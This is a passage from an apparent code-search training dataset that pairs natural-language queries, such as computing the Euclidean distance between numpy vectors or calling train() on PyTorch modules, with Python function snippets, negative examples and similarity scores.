dump_pinball_music():\n\texport_sounds(song_labels, os.path.join(conf.path, 'music'), 'Music_')", "def process_wav_files(wav_dir, id_list, out_dir, calc_mvn):\n file_ids = utils.get_file_ids(wav_dir, id_list)\n\n os.makedirs(os.path.join(out_dir, 'f0'), exist_ok=True)\n os.makedirs(os.path.join(out_dir, 'lf0'), exist_ok=True)\n os.makedirs(os.path.join(out_dir, 'vuv'), exist_ok=True)\n os.makedirs(os.path.join(out_dir, 'sp'), exist_ok=True)\n os.makedirs(os.path.join(out_dir, 'ap'), exist_ok=True)\n\n @utils.multithread\n def save_wav_to_files(file_id):\n wav_path = os.path.join(wav_dir, '{}.wav'.format(file_id))\n wav = wav_features.Wav(wav_path)\n\n f0, vuv, sp, ap = wav.extract_features()\n\n file_io.save_bin(f0, os.path.join(out_dir, 'f0', '{}.f0'.format(file_id)))\n file_io.save_bin(np.log(f0), os.path.join(out_dir, 'lf0', '{}.lf0'.format(file_id)))\n file_io.save_bin(vuv, os.path.join(out_dir, 'vuv', '{}.vuv'.format(file_id)))\n file_io.save_bin(sp, os.path.join(out_dir, 'sp', '{}.sp'.format(file_id)))\n file_io.save_bin(ap, os.path.join(out_dir, 'ap', '{}.ap'.format(file_id)))\n\n save_wav_to_files(file_ids)\n\n if calc_mvn:\n calclate_mvn_parameters(out_dir, 'f0', id_list=id_list, dtype=np.float32)\n calclate_mvn_parameters(out_dir, 'lf0', id_list=id_list, dtype=np.float32)\n calclate_mvn_parameters(out_dir, 'vuv', id_list=id_list, dtype=np.float32)\n calclate_mvn_parameters(out_dir, 'sp', id_list=id_list, dtype=np.float32)\n calclate_mvn_parameters(out_dir, 'ap', id_list=id_list, dtype=np.float32)", "def save_results(self, *args):\n try:\n filename = args[0]\n except IndexError:\n filename = self.filename\n results = {}\n results['gp_pred'] = self.gp_predictions\n results['func_val'] = self.target_func_vals\n results['inds_all'] = np.array(self.indices_all)\n results['vals_all'] = np.array(self.vals_all)\n np.save(filename+\".npy\", results)", "def get_filenames(mode, data_dir):\n if mode == 'train':\n return [os.path.join(data_dir, 'encoder.train.input'), os.path.join(data_dir, 'encoder.train.target'),\n os.path.join(data_dir, 'decoder.train.target')]\n else:\n return [os.path.join(data_dir, 'encoder.test.input'), os.path.join(data_dir, 'encoder.test.target'),\n os.path.join(data_dir, 'decoder.test.target')]", "def write_predictions(prediction_dic, result_path):\n with open(result_path, 'wb') as outfile:\n outfile.write(bytes('Patient_ID,HPV/p16_status\\n', 'UTF-8'))\n for patient_id, pred in prediction_dic.items():\n outfile.write(bytes(str(patient_id) + ',' + str(pred) + '\\n', 'UTF-8'))", "def separate_voices_dir(dir_path, compare=True, extensions=['.mei', '.musicxml', '.mid']):\n files = [os.path.join(root, name)\n for root, dirs, files in os.walk(dir_path)\n for name in files\n if name.endswith((extensions))]\n\n i = 1\n file_result = {}\n for file in files[:20]:\n print('FILE', i, 'out of', len(files))\n print(file)\n i += 1\n\n score = m21.converter.parse(file)\n # find nb of voices\n nb_voices = get_number_of_voices(score)\n print('Nb of voices: ', nb_voices)\n\n # focus on scores with at most 4 voices\n if nb_voices < 5:\n score, total_cost = separate_voices_score(\n score, parameters=Parameters(max_voices=nb_voices))\n file_result[total_cost] = file\n\n with open('results.json', 'w') as outfile:\n json.dump(file_result, outfile, indent=4, sort_keys=True)" ]
[ "0.60163605", "0.60031205", "0.59263384", "0.588661", "0.58185124", "0.58125246", "0.5753232", "0.5715541", "0.56986034", "0.56940067", "0.56717575", "0.5634953", "0.5573612", "0.5497498", "0.5478532", "0.5429409", "0.5406123", "0.53959244", "0.53919566", "0.5375165", "0.5352405", "0.53425497", "0.53365695", "0.53198785", "0.53128135", "0.52843964", "0.5273146", "0.52530736", "0.5248159", "0.5221517", "0.52202594", "0.5217072", "0.52016574", "0.5199738", "0.5191862", "0.51853216", "0.5184447", "0.5182034", "0.516757", "0.516461", "0.5164111", "0.5152989", "0.515181", "0.515017", "0.5146391", "0.5140898", "0.513349", "0.51325554", "0.5132016", "0.51301575", "0.5125124", "0.5122331", "0.5121192", "0.5105907", "0.510208", "0.5099301", "0.5097638", "0.50963455", "0.5090598", "0.5088189", "0.5085971", "0.50805944", "0.50604653", "0.5056288", "0.50559926", "0.5054469", "0.5046819", "0.5038054", "0.5026414", "0.5023255", "0.50098884", "0.500782", "0.5006028", "0.5004621", "0.50019747", "0.5000529", "0.5000046", "0.49992907", "0.49934152", "0.49933255", "0.49880368", "0.49879327", "0.4986277", "0.49829134", "0.49814817", "0.49736163", "0.49678844", "0.4965487", "0.4964913", "0.49605575", "0.49589097", "0.4958075", "0.49446756", "0.49431658", "0.49416274", "0.49371123", "0.493708", "0.4934755", "0.493341", "0.49329793" ]
0.6846945
0
Compute the euclidean distance between two numpy vectors
def euclidean_distance(a, b): return np.linalg.norm(a - b)
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def euclidean_distance(vec1, vec2):\n return numpy.linalg.norm(vec1 - vec2)", "def euclidean_distance_no_np(vector_1: Vector, vector_2: Vector) -> VectorOut:\n return sum((v1 - v2) ** 2 for v1, v2 in zip(vector_1, vector_2)) ** (1 / 2)", "def euclidean_distance(x: np.ndarray, y: np.ndarray) -> float:\n distance_vector: np.ndarray = x - y\n distance = compute_norm(distance_vector)\n return distance", "def euclidean_distance(x: np.ndarray, y: np.ndarray) -> float:\n\n distance = np.linalg.norm(x - y)\n\n return distance", "def compute_euclidean_dist(vec1, vec2):\r\n assert len(vec1) == len(vec2)\r\n vec1 = np.array(vec1)\r\n vec2 = np.array(vec2)\r\n return np.sqrt(np.sum(np.square(vec2 - vec1)))", "def euclidean_distance(vector_1: Vector, vector_2: Vector) -> VectorOut:\n return np.sqrt(np.sum((np.asarray(vector_1) - np.asarray(vector_2)) ** 2))", "def euclidean_distance(x1: np.ndarray, x2: np.ndarray) -> float:\n return np.sqrt(np.square(x1 - x2).sum())", "def get_euclid_dist(vec_1, vec_2):\n\n\treturn np.sqrt(np.sum(np.fabs(vec_1 - vec_2), axis=1)).flatten()", "def _vector_dist(self, vec1, vec2):\r\n return sqrt(sum([(float(v1) - float(v2)) ** 2 for v1, v2 in\r\n zip(vec1, vec2)]))", "def euclidean_distance(vector_x, vector_y):\n if len(vector_x) != len(vector_y):\n raise Exception('Vectors must be same dimensions')\n return math.sqrt(sum((vector_x[dim] - vector_y[dim]) ** 2 for dim in range(len(vector_x))))", "def euclidian_distance(x: np.arrays, y: np.arrays):\r\n diff = x - np.mean(y, axis=0)\r\n return np.sqrt(np.dot(diff.T, diff))", "def euclidean_distance(x1, x2):\n return np.sqrt(np.sum(np.square(np.subtract(x1, x2))))", "def euclidean_distance(vector1, vector2):\n e_dist = [(v1 - v2) ** 2 for v1, v2 in zip(vector1, vector2)]\n e_dist = math.sqrt(sum(e_dist))\n return e_dist", "def euclidean_dist_vec(y1, x1, y2, x2):\n\n # euclid's formula\n distance = ((x1 - x2) ** 2 + (y1 - y2) ** 2) ** 0.5\n return distance", "def euclidean_distance(x1, x2):\n return np.sqrt(np.sum(np.power(x1 - x2, 2)))", "def euclideanDistance(a, b):\n vec = [pow(a[i] - b[i], 2) for i in range(len(a)) if None not in [a[i],b[i]]]\n return (sum(vec) / len(vec)) if len(vec) > 0 else NaN", "def euclidean_distance(arr1,arr2):\n distance = np.sqrt(np.sum((arr1 - arr2)**2))\n return distance", "def euclidean_distance(x, y):\n return sqrt(sum(pow(a - b, 2) for a, b in zip(x, y)))", "def eucl_dist(a, b):\n return np.sqrt( (a[0]-b[0])** 2 + (a[1]-b[1])** 2)", "def euclidean_distance(x1, x2):\n return (x2[0] - x1[0])**2 + (x2[1] - x1[1])**2", "def euclidean_distance(point1, point2):\n return np.linalg.norm(np.array(point1) - np.array(point2))", "def euclidean_distance(a, b):\n return sqrt((a[0] - b[0])**2 + (a[1] - b[1])**2)", "def EuclideanDistanceSq( self, a, b ):\n if not (type(a) == list or type(a) == Vector):\n a = [a]\n if not (type(b) == list or type(a) == Vector):\n b = [b]\n assert len(a) == len(b)\n sqDist = 0\n for x,y in zip(a,b):\n sqDist += (x-y)**2\n return sqDist", "def euclidean_distance(a: Tuple[float, ...], b: Tuple[float, ...]) -> float:\n assert len(a) == len(b)\n return sqrt(sum(pow(x[0] - x[1], 2) for x in zip(a, b)))", "def euclidean_distance(point_one, point_two):\n return np.linalg.norm(point_one-point_two)", "def edist(a, b):\n return euclidean(np.array(a), np.array(b))", "def euclidean(x, y):\n return np.sqrt(np.sum((x - y) ** 2))", "def distance(x,y):\n return np.sqrt( np.power(np.array(x) - np.array(y), 2).sum() )", "def euclidean_distance(x, y):\n distance = 0\n for i, j in zip(x, y):\n distance += (i - j) ** 2\n return math.sqrt(distance)", "def euclidean_distance(a, b, axis=1):\n return np.sum((a-b)**2, axis=axis)**.5\n #NOTE: the below be preferred for \"big\" comparisons in dim 1 of b\n #return np.apply_along_axis(np.linalg.norm, axis, doca-docb)", "def euclidean_dist(X, y):\n return np.sqrt(np.sum((X - y) ** 2, 1)) # broadcasted calculations", "def euclidean_metric(x, y):\n if len(x) != len(y):\n raise ValueError(\"Incompatible dimensions.\")\n return np.linalg.norm(x - y)\n \n # Or a slightly longer way:\n return np.sqrt(np.sum(np.subtract(x, y)**2))\n # Or the longest/worst way:\n total = 0\n for i in xrange(len(x)):\n term = x[i] - y[i]\n term = term**2\n total += term\n total = np.sqrt(total)\n return total", "def __dist(u, v):\n return spatial.distance.euclidean(u, v)", "def dist(v1: vect2d, v2: vect2d) -> float:\n d = ((v2.x - v1.x)**2 + (v2.y - v1.y)**2) ** 0.5\n return d", "def _euclid_distance(self, A, B, axis=1):\n return np.linalg.norm(A - B, axis=axis)", "def euclidean_distance(vector_1, vector_2) -> float:\n\n\n before_square_root = 0\n for i in range(len(vector_1)):\n before_square_root += (vector_1[i] - vector_2[i])**2\n\n d = math.sqrt(before_square_root)\n print(d)\n return(d)", "def euclidean(x,y): \n\treturn np.sqrt(np.sum((x-y)**2))", "def distance(a, b):\n return (np.sum((a - b)**2))**0.5", "def euclid_dist(p1, p2):\n \n return float(np.linalg.norm(np.array(p1)-np.array(p2)))", "def compare_vectors(v1, v2):\n if len(v1) == len(v2):\n distance = 0\n for i in xrange(len(v1)):\n distance += (v1[i] - v2[i]) ** 2\n return distance\n else:\n print \"vector not match in dimensions\"", "def euclidean(x,y):\n\tassert (isinstance(x, BayesNet) and isinstance(y, BayesNet)), 'Must pass in BayesNet objects.'\n\tassert (x==y), 'Passed-in BayesNet objects are not structurally equal.'\n\n\tdistance = np.sum( np.sqrt( ( x.flat_cpt() - y.flat_cpt() )**2 ) )\n\treturn distance", "def compute_feature_distances(features1: np.ndarray, \r\n features2: np.ndarray) -> np.ndarray:\r\n #broadcasting trick\r\n a = features1[:, np.newaxis, :]\r\n b = features2[np.newaxis, :, :]\r\n \r\n return np.linalg.norm( (a-b), axis=-1)", "def distance(p1, p2):\n return np.linalg.norm(np.array(p1) - np.array(p2))", "def GetDistance(vec1,vec2):\n diff = np.asarray(vec1) - np.asarray(vec2)\n squareDistance = np.dot(diff.T, diff)\n return math.sqrt(squareDistance)", "def euclidean_distance(s1,s2): \n tmpsum = 0\n \n for index,value in enumerate(s1):\n tmpsum += (s1[index]-s2[index])**2\n \n return math.sqrt(tmpsum)", "def euclidean_distance(x1, x2):\n\tdistance = 0\n\t# Squared distance between each coordinate\n\tfor i in range(len(x1)):\n\t\tdistance += pow((x1[i], x2[i]), 2)\n\treturn math.sqrt(distance)", "def euclidean_distance(p1, p2):\n distance = 0\n for i in range(len(p1)-1):\n distance += (p1[i]-p2[i])**(2)\n return sqrt(distance)", "def distance(a,b):\n return np.sqrt( (x(a)-x(b))**2 + (y(a)-y(b))**2 )", "def hellinger_dist(v1, v2):\n if len(v1) != len(v2):\n raise ValueError(\"Vectors should have the same size! \")\n return sqrt( sum( map(lambda e: \n (sqrt(e[0])-sqrt(e[1]))**2, zip(v1,v2))))/sqrt(2)", "def distance(a, b):\n return math.sqrt((a[0]-b[0])**2 + (a[1]-b[1])**2)", "def _euclidian_distance(self, x1, x2):\n a= x1-x2\n a2 = a**2\n b = np.sum(a2, axis=1)\n c = np.sqrt(b)\n return c", "def euclidean_distance(p1, p2):\n dist = np.sqrt((p1[0] - p2[0])**2 + (p1[1] - p2[1])**2)\n return dist", "def distance_metric(u, v):\n if len(u) != len(v):\n raise Exception(\n \"Distance metric not valid for differently sized vectors\")\n sum = 0.\n for i in range(len(u)):\n sum += ((u[i] - v[i]) ** 2)\n return math.sqrt(sum)", "def compute_distance(node1, node2):\n return np.linalg.norm(node1 - node2)", "def dist(a, b):\n return np.sum((a-b)**2.0)**.5", "def dist_2D(v1, v2):\n return ((v1[0]-v2[0])**2 + (v1[1]-v2[1])**2 )**(0.5)", "def compute_distance (uVector, uOther):\n ## since each element can be either 0 or 1,\n ## no need for square roots and pow\n d = 0\n for i in range (len(uVector)):\n d = d + math.pow((int(uVector [i]) - int(uOther [i])), 2)\n\n return d", "def euclidean_distances(X, Y):\r\n\r\n D = np.zeros((X.shape[0],Y.shape[0]))\r\n \r\n for X_idx in range(X.shape[0]):\r\n for Y_idx in range(Y.shape[0]): \r\n \r\n D[X_idx,Y_idx] = np.sqrt(np.sum((X[X_idx,:]-Y[Y_idx,:])**2))\r\n \r\n return D", "def euclidean(p1, p2):\n return p1.distance(p2)", "def distance(self, vector1, vector2):\n\t\tsum_sq = 0\n\t\tfor i in range(28):\n\t\t\tfor j in range(28):\n\t\t\t\tsum_sq += (vector1[i][j] - vector2[i][j])**2\n\t\treturn math.sqrt(sum_sq)", "def euclidean_distance(point1, point2):\n\n return math.sqrt(sum([(x - y) ** 2 for x, y in zip(point1, point2)]))", "def distance(a,b): \r\n return math.sqrt((a[0] - b[0])**2 + (a[1] - b[1])**2)", "def distance(p1, p2):\n return np.linalg.norm(p2-p1)", "def distance(v1, v2):\r\n return magnitude(*subtract(v2, v1))", "def GetDist(feature_1, feature_2):\n return np.linalg.norm(feature_1 - feature_2)", "def distance(a, b):\n return math.sqrt((b[0]-a[0])**2 + (b[1]-a[1])**2)", "def dist(v1, v2):\n return ( (v1[0] - v2[0])**2 + (v1[1] - v2[1])**2 )**0.5", "def distance(f1, f2):\n\n return np.sum((np.sum([f1, -f2], axis=0))**2, axis=1)", "def euclidean(x, y):\n ed = np.sqrt(np.sum((x-y)**2))\n # print ed\n return ed", "def dist2D(a, b):\n return ((a[0]-b[0])**2 + (a[1]-b[1])**2)**0.5", "def _euclideanDistance(A, B):\n if len(A) != len(B):\n raise ValueError(\"A and B must have the same number of dimensions\")\n sqr_dist = 0\n for i in range(len(A)):\n sqr_dist += (A[i] - B[i])**2\n return np.sqrt(sqr_dist)", "def calcEuclideanDistance(d1, d2):\n #initiate empty list\n result = []\n #for each index in the list, each position in both list minus each other\n #and to the power of two. Add this in the result list\n for idx in range(len(d1)):\n result.append((d1[idx]-d2[idx])**2)\n\n #Return the square of the sum of all values in the result list\n return math.sqrt(sum(result))", "def euclidean(self, other):\n return linalg.norm([self.x - other.x, self.y - other.y])", "def euclidean_distance(data1, data2):\n #Convert data into numpy array\n array1 = np.array(data1)\n array2 = np.array(data2)\n \n #Create distance array\n dist_array = np.sqrt(np.sum((array2-array1)**2, axis=1))\n \n #Reshape array before return results\n return np.reshape(dist_array, [len(dist_array),1])", "def _dist(A, B):\n return np.sqrt(np.einsum(\"ijk->ij\", (A[:, None, :] - B) ** 2))", "def get_euclidean_distance(p1, p2):\n return np.sqrt(np.power((p2[0] - p1[0]), 2) + np.power((p2[1] - p1[1]), 2))", "def distance(a, b):\n if len(a) > len(b):\n a = a[:len(b)]\n elif len(b) > len(a):\n b = b[:len(a)]\n\n ar = numpy.array(a)\n br = numpy.array(b)\n dist = numpy.linalg.norm(ar-br)\n\n return dist", "def get_distance(descriptive_vector1, descriptive_vector2 ):\n return np.linalg.norm(descriptive_vector1 - descriptive_vector2)", "def l2_distance(v1, v2):\n\treturn np.linalg.norm(np.array(v1) - np.array(v2))", "def euclid_dist(vec, mat):\n return np.linalg.norm(mat - vec, axis=1)", "def distance(a, b):\n dx = a[0] - b[0]\n dy = a[1] - b[1]\n\n return math.sqrt(dx*dx + dy*dy)", "def distance_point_point(a, b):\n ab = subtract_vectors(b, a)\n return length_vector(ab)", "def eucl_dist(x_0, y_0, x_1, y_1):\n return sqrt((x_1 - x_0)**2 + (y_1 - y_0)**2)", "def EuclideanDistance( self, a, b ):\n return sqrt( self.EuclideanDistanceSq(a,b) )", "def _get_distance(a, b):\n return np.sqrt(np.sum((a - b) ** 2))", "def distance(p0, p1):\n return( numpy.sqrt( (p0[0]-p1[0])**2 + \n (p0[1]-p1[1])**2 + \n (p0[2]-p1[2])**2 ) )", "def dist(self, one, two):\n return np.sqrt((one[0] - two[0]) ** 2 + (one[1] - two[1]) ** 2)", "def dist(a, b):\n return math.sqrt(pow(a[0] - b[0], 2) + pow(a[1] - b[1], 2))", "def _dist(x, y):\n return np.sqrt(np.mean(np.square(x - y)))", "def dist(first, other):\n if isinstance(first,FreeCAD.Vector) and isinstance(other,FreeCAD.Vector):\n return length(sub(first,other))", "def get_euclidean_vector(vector):\n\n return np.subtract(vector[1], vector[0])", "def norm_dist(face_vectors, f_vector):\n if len(face_vectors) == 0:\n return np.empty((0))\n return np.linalg.norm(face_vectors - f_vector, axis=1)", "def test_vector_dist(self):\r\n v1 = [1, 4, 2]\r\n v2 = [-1, 12, 4]\r\n\r\n exp = 8.48528137424\r\n obs = self.best._vector_dist(v1, v2)\r\n assert_almost_equal(exp, obs)\r\n\r\n v1 = [1, 2, 100, 4, 2]\r\n v2 = [-1, 12, 4, 12, 99]\r\n\r\n exp = 137.087563258\r\n obs = self.best._vector_dist(v1, v2)\r\n assert_almost_equal(exp, obs)", "def euclidean_distance(start, end):\n\n value = np.sqrt(np.sum(np.square(np.subtract(start, end)), axis=-1))\n return value", "def distance(self, u, v):\n numerator = np.dot(u,v)\n denominator = np.linalg.norm(u) * np.linalg.norm(v)\n similarity = numerator/(denominator +1e-7)\n return similarity", "def euclideanDistance(loc1, loc2):\n return math.sqrt(sum([(a - b) ** 2 for a, b in zip(loc1, loc2)]))", "def distance(a, b):\n return math.sqrt((a.x - b.x) ** 2 + (a.y - b.y) ** 2)", "def euclidean_distance(A, B):\n aa = T.sum(A * A, axis=1)\n bb = T.sum(B * B, axis=1)\n AB = T.dot(A, T.transpose(B))\n\n AA = T.transpose(T.tile(aa, (bb.shape[0], 1)))\n BB = T.tile(bb, (aa.shape[0], 1))\n\n D = AA + BB - 2 * AB\n\n # Sanity checks\n D = T.maximum(D, 0)\n D = T.sqrt(D)\n return D", "def dist_vec(x, y, cxy):\n x0 = cxy[0]\n y0 = cxy[1]\n x_dist = x - x0\n y_dist = y - y0\n dist = np.sqrt(x_dist ** 2 + y_dist ** 2)\n return dist", "def _euclidean_distance(self, points_a, points_b):\n assert len(points_a.shape) == 2\n assert len(points_b.shape) == 2\n\n transpose_b = points_b.T\n dot = np.dot(points_a, transpose_b)\n\n a_mode_sq = np.tile(\n (points_a ** 2).sum(-1, keepdims=True), (1, points_b.shape[0]))\n b_mode_sq = np.tile((transpose_b ** 2).sum(0, keepdims=True),\n (points_a.shape[0], 1))\n\n distance = np.sqrt(a_mode_sq + b_mode_sq - 2 * dot)\n return distance" ]
[ "0.8293001", "0.82679814", "0.8241531", "0.8164159", "0.8139716", "0.8110727", "0.8093996", "0.8087907", "0.80677295", "0.7933276", "0.79193497", "0.7915708", "0.7905538", "0.7787108", "0.7761666", "0.7725438", "0.76735663", "0.7641406", "0.75959605", "0.75740075", "0.75653476", "0.7564119", "0.7546421", "0.75155056", "0.7505864", "0.7470387", "0.7468808", "0.74614185", "0.7461348", "0.744596", "0.7437016", "0.7432117", "0.73862517", "0.73805165", "0.7356142", "0.73374504", "0.733591", "0.7320653", "0.73205805", "0.7319544", "0.7308073", "0.7306699", "0.73026186", "0.72810733", "0.7276327", "0.7261971", "0.7233207", "0.7229153", "0.7227733", "0.7226113", "0.7221546", "0.7220921", "0.7209405", "0.7198948", "0.71902126", "0.718443", "0.71815795", "0.7179247", "0.71746194", "0.71723473", "0.7169898", "0.71682245", "0.7166851", "0.7159566", "0.71505827", "0.7149712", "0.71461195", "0.7131098", "0.7130067", "0.7126345", "0.711279", "0.7105268", "0.70971036", "0.7072426", "0.7071723", "0.7068885", "0.70661855", "0.70506203", "0.7030955", "0.69989717", "0.69946617", "0.69894934", "0.6985432", "0.6980146", "0.6979083", "0.69774526", "0.69770473", "0.69671685", "0.6957396", "0.6955987", "0.6942412", "0.6938101", "0.6931861", "0.6924048", "0.6921816", "0.6915252", "0.69128597", "0.6912004", "0.69010246", "0.68965566" ]
0.8229706
3
Should call Module.train() on each torch.nn.Module, if present
def train(self): pass
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def train(self) -> None:\n for module in self.modules.values():\n module.train()\n return", "def to_train(self):\n for _m in self.modules.values():\n _m.train()", "def set_train(self):\n for m in self.models.values():\n m.train()", "def train(self):\n self.ae_train(self.net0, self.ae0_optimizer, self.train0_loader, self.val_loader, name='Net0')\n self.ae_train(self.net1, self.ae1_optimizer, self.train1_loader, self.val_loader, name='Net1')\n self.ae_train(self.net2, self.ae2_optimizer, self.train2_loader, self.val_loader, name='Net2')\n\n self.classifier_train(self.net0, self.optimizer0, self.train0_loader, self.val_loader, name='Net0')\n self.classifier_train(self.net1, self.optimizer1, self.train1_loader, self.val_loader, name='Net1')\n self.classifier_train(self.net2, self.optimizer2, self.train2_loader, self.val_loader, name='Net2')", "def train(self):\n for name in self.network_names:\n if isinstance(name, str):\n net = getattr(self, 'net')\n net.train()", "def train(train_loader : torch.utils.data.DataLoader, model : nn.Module, criterion : nn.Module, optimizer : torch.optim.Optimizer) -> logger.Result:", "def train(self, mode=True, mc_dropout=False):\n self.training = mode\n for module_name, module in self.named_modules():\n module.training = mode\n if mc_dropout and not mode:\n if isinstance(module, nn.Dropout2d):\n # print(\"WARNING - nn.Module.train - {}\".format(module_name))\n module.training = True\n\n return self", "def initialize_training_false_recursive(module: Module) -> Module:\n if isinstance(module, (BatchNorm1d, BatchNorm2d, BatchNorm3d)):\n initialize_batch_norm_eval(module)\n else:\n for module_child in module.children():\n initialize_training_false_recursive(module_child)\n return module.train(False)", "def train(self, mode=True):\n super().train(mode)\n if mode and self.norm_eval:\n for m in self.modules():\n if isinstance(m, _BatchNorm):\n m.eval()", "def load_networks(self, epoch: int) -> None:\n for name, module in self.modules.items():\n if isinstance(name, str):\n load_filename = '%s_net_%s.pth' % (epoch, name)\n load_path = os.path.join(self.save_dir, load_filename)\n if isinstance(module, torch.nn.DataParallel):\n module = module.module\n print('loading the model from %s' % load_path)\n state_dict = torch.load(load_path, map_location=str(self.device))\n if hasattr(state_dict, '_metadata'):\n del state_dict._metadata\n # patch InstanceNorm checkpoints prior to 0.4\n for key in list(state_dict.keys()): # need to copy keys here because we mutate in loop\n self.__patch_instance_norm_state_dict(state_dict, module, key.split('.'))\n module.load_state_dict(state_dict)\n return", "def train(self, mode=True):\n super().train(mode)\n self._freeze_stages()\n if mode and self.norm_eval:\n for m in self.modules():\n if isinstance(m, _BatchNorm):\n m.eval()", "def test():\n return _make_modules(is_train=False)", "def train(self, mode=True, freeze_bn=False):\n super(NetFeat, self).train(mode)\n self.freeze_bn = freeze_bn\n if self.freeze_bn:\n for m in self.modules():\n if isinstance(m, nn.BatchNorm2d):\n m.eval()\n m.weight.requires_grad = False\n m.bias.requires_grad = False", "def _train(self):\n step = 0\n for epoch in range(self.opts.num_epochs):\n self.hub.publish(Topic.EPOCH, epoch)\n for i, data in enumerate(self.loader):\n # Compute loss ...\n # NOTE(ycho): if one of the callbacks require training loss,\n # e.g. for logging, simply register a hook to the loss module\n # rather than trying to extract them here.\n loss = self.loss_fn(self.model, data)\n self.hub.publish(Topic.TRAIN_LOSS, loss)\n\n # Backprop + Optimize ...\n self.optim.zero_grad()\n loss[\"total\"].backward()\n self.optim.step()\n\n # Emit `step` event.\n # == logging, saving, evaluation\n self.hub.publish(Topic.STEP, step)\n step += 1\n\n if step >= self.opts.train_steps:\n return", "def train(self, iterations=1):\n for _ in range(iterations):\n self.trainer.train()\n self.test_network()", "def train_one_cycle(self, module_dict: ModuleDict):\n array_dict: ArrayDict = self.sample_collector.collect_samples_by_number()\n n_batches = int(array_dict.n_examples / self.batch_size)\n for trainee in self.trainees:\n for epoch in range(trainee.n_epochs):\n all_idxs = np.random.choice(array_dict.n_examples, array_dict.n_examples, replace=False)\n batch_idxs = np.array_split(all_idxs, n_batches)\n tensor_dict: TensorDict = TensorDict()\n for batch_idx in batch_idxs:\n trainee.tensor_inserter.insert_tensor(tensor_dict, array_dict, module_dict, batch_idx)\n loss = trainee.loss_calculator.calculate_loss(tensor_dict)\n trainee.module_updater.update_module(loss)", "def train(entropy_fn):\n del entropy_fn # unused\n return _make_modules(is_train=True)", "def train(self):\n self.emission_model(self.train_data)\n self.transition_model(self.train_data)", "def test_init(self, epochs):\n i = -1\n for p in self.P:\n for subband in self.SUBBANDS:\n i += 1\n\n # --- load model ----\n pref = self.model_dir + \"/\" + self.name % (subband, p)\n model = copy.deepcopy(self.model)\n model.model.load_weights(pref + \"_epochs_%d\" % epochs[i])\n self.NET.append(model)\n # --- end load model ----\n\n # --- load permutation ----\n self.permutation.append(\n np.load(self.model_dir + \"/permutation_\" + self.name %\n (subband, p) + \".npy\"))\n # --- end load permutation ----", "def train(self, mode=True):\n super(ResNet, self).train(mode)\n self._freeze_stages()\n if mode and self.norm_eval:\n for m in self.modules():\n # trick: eval have effect on BatchNorm only\n if isinstance(m, _BatchNorm):\n m.eval()", "def before_train(self, logs=None):\n self.config = self.trainer.config\n self.unrolled = self.trainer.config.unrolled\n self.device = self.trainer.config.device\n self.model = self.trainer.model\n self.optimizer = self.trainer.optimizer\n self.lr_scheduler = self.trainer.lr_scheduler\n self.loss = self.trainer.loss\n self.search_alg = SearchAlgorithm(SearchSpace())\n self._set_algorithm_model(self.model)\n self.trainer.train_loader = self.trainer._init_dataloader(mode='train')\n self.trainer.valid_loader = self.trainer._init_dataloader(mode='val')\n normal_selected_idxs = torch.tensor(len(self.model.alphas_normal) * [-1],\n requires_grad=False, dtype=torch.int).cuda()\n reduce_selected_idxs = torch.tensor(len(self.model.alphas_reduce) * [-1],\n requires_grad=False, dtype=torch.int).cuda()\n normal_candidate_flags = torch.tensor(len(self.model.alphas_normal) * [True],\n requires_grad=False, dtype=torch.bool).cuda()\n reduce_candidate_flags = torch.tensor(len(self.model.alphas_reduce) * [True],\n requires_grad=False, dtype=torch.bool).cuda()\n logging.info('normal_selected_idxs: {}'.format(normal_selected_idxs))\n logging.info('reduce_selected_idxs: {}'.format(reduce_selected_idxs))\n logging.info('normal_candidate_flags: {}'.format(normal_candidate_flags))\n logging.info('reduce_candidate_flags: {}'.format(reduce_candidate_flags))\n self.model.normal_selected_idxs = normal_selected_idxs\n self.model.reduce_selected_idxs = reduce_selected_idxs\n self.model.normal_candidate_flags = normal_candidate_flags\n self.model.reduce_candidate_flags = reduce_candidate_flags\n logging.info(F.softmax(torch.stack(self.model.alphas_normal, dim=0), dim=-1).detach())\n logging.info(F.softmax(torch.stack(self.model.alphas_reduce, dim=0), dim=-1).detach())\n self.normal_probs_history = []\n self.reduce_probs_history = []", "def train(self, mode: bool = True):\n if self.nn_module.training != mode:\n self.nn_module.train(mode)", "def initialize(self):\n for m in self.modules():\n if isinstance(m, nn.Conv2d) or isinstance(m, nn.Linear):\n nn.init.xavier_normal_(m.weight)\n if m.bias is not None:\n nn.init.constant_(m.bias, 0)\n elif isinstance(m, nn.BatchNorm2d):\n nn.init.constant_(m.weight, 1)\n nn.init.constant_(m.bias, 0)", "def setUp(self):\n\t\tprint(\"\\n-------------------------------------\\nIn Test_PyTorchLayers:\", self._testMethodName)\n\t\tww.weightwatcher.torch = torch\n\t\tself.model = models.resnet18()\n\t\tfor layer in self.model.modules():\n\t\t\tself.last_layer = layer", "def train(self, mode: bool = True) -> None:\n super().train(mode=mode)\n if mode:\n self.mean_module = None\n self.covar_module = None\n self.likelihood = None\n self.task_covar_module = None", "def _init_modules(self, pretrained_weights=None):\n if pretrained_weights is None:\n if cfg.MODEL.LOAD_PRETRAINED_BACKBONE_WEIGHTS:\n print(\"\\n-------------------------------------------\")\n print(\"Load pre-trained ImageNet weights\")\n print(\"\\n-------------------------------------------\")\n weight_utils.load_caffe2_pretrained_weights(self, cfg.MODEL.PRETRAINED_BACKBONE_WEIGHTS)\n return\n\n pretrained_detectron = torch.load(pretrained_weights)\n\n if cfg.RPN.RPN_ON:\n load_layers = ['Conv_Body', 'RPN']\n else:\n load_layers = ['Conv_Body']\n\n mapping, _ = self.detectron_weight_mapping()\n state_dict = {}\n ckpt = pretrained_detectron['model']\n for name in ckpt:\n if name.split('.')[0] in load_layers:\n if mapping[name]:\n state_dict[name] = ckpt[name]\n self.load_state_dict(state_dict, strict=False)\n del pretrained_detectron\n torch.cuda.empty_cache()", "def init_weights(self, clz):\n for ch in self.children():\n if issubclass(ch.__class__, nn.Module) and not issubclass(ch.__class__, PreTrainedModel):\n ch.apply(lambda module: clz._init_weights(self.lrm, module))", "def train(self, mode=True):\n nn.Module.train(self, mode)\n\n if mode:\n # Set all bn layers in backbone to eval mode\n def set_bn_eval(m):\n classname = m.__class__.__name__\n if classname.find(\"BatchNorm\") != -1:\n m.eval()\n\n self.backbone.apply(set_bn_eval)", "def before_epoch(self, epoch, logs=None):\n if vega.is_torch_backend():\n self.valid_loader_iter = iter(self.trainer.valid_loader)", "def _train(self):\n self.network.train() # note that here we are calling torch.nn.Module train 